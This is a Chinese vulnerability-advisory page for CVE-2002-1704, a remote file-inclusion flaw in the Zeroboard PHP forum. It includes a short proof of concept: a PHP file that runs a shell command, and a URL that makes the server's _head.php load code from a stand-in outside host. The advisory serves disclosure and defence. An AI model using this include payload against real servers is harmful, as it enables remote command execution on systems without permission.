Zeroboard PHP包含文件任意命令执行漏洞

Zeroboard PHP包含文件任意命令执行漏洞

漏洞ID 1106801 漏洞类型 输入验证
发布时间 2002-06-15 更新时间 2005-10-20
图片[1]-Zeroboard PHP包含文件任意命令执行漏洞-安全小百科CVE编号 CVE-2002-1704
图片[2]-Zeroboard PHP包含文件任意命令执行漏洞-安全小百科CNNVD-ID CNNVD-200212-323
漏洞平台 PHP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21557
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-323
|漏洞详情
Zeroboard是一款韩国的PHPWEB论坛程序。Zeroboard中的_head.php脚本对用户输入缺少正确检查和过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。当php.ini配置文件中设置”allow_url_fopen”变量,”register_globals”变量为”on”时,由于_head.php对输入过滤不够充分,攻击者可以通过_head.php脚本装载远程主机上的PHP文件,如果远程PHP文件包含恶意PHP代码,可导致以WEB进程在系统上执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/5028/info

Zeroboard is a PHP web board package available for the Linux and Unix platforms.

Under some circumstances, it may be possible to include arbitrary PHP files. The _head.php file does not sufficiently check or sanitize input. When the "allow_url_fopen" variable and the "register_globals" variable in php.ini are set to "On," it is possible to load a PHP include file from a remote URL via the _head.php script. 

PHP Source file a.php
<? passthru("/bin/ls"); ?>

Accessing URL on vulnerable system:
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
|参考资料

来源:XF
名称:zeroboard-include-remote-file(9366)
链接:http://xforce.iss.net/xforce/xfdb/9366
来源:BID
名称:5028
链接:http://www.securityfocus.com/bid/5028
来源:NSFOCUS
名称:2988
链接:http://www.nsfocus.net/vulndb/2988

相关推荐: Jarle Aase War FTPD Directory Traversal Vulnerability

Jarle Aase War FTPD Directory Traversal Vulnerability 漏洞ID 1103421 漏洞类型 Input Validation Error 发布时间 2001-03-06 更新时间 2001-03-06 CVE…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享